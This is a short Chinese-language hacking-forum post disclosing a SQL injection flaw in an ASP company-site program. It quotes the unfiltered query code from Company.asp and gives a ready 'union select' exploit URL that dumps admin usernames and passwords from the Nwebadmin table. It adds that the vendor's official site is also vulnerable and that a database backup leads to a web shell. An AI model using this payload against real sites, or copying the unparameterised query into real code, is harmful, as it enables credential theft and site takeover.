话说天天看90sec的大牛们无聊乱丢Oday,小菜我等实在是诚惶诚恐啊。。。
在站长之家下了个小程序,一个简单的漏洞。。大牛莫笑,,不要踩俺。。谢谢。。
文件:Company.asp
<%
ID=trim(request.QueryString("id"))
if ID="" then ID=1
set Rs = server.createobject("adodb.recordset")
Rs.source = "select * from Company where ID="&ID&""
Rs.open Rs.source,conn,1,3
if Rs.eof then
Content="还没有添加相关内容!"
else
Kig=Rs("Kig")
Rs("kig")=Kig+1
Rs.update
Content=Rs("Content")
ComName=Rs("ComName")
end if
Rs.close
set Rs=nothing
%>
什么都没过滤。。
exp:
Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin
官网也存在。。
备份数据库可以拿到shell。
PS:chmodx大大真的是个好人,教会了我很多。爱死他了~~~~~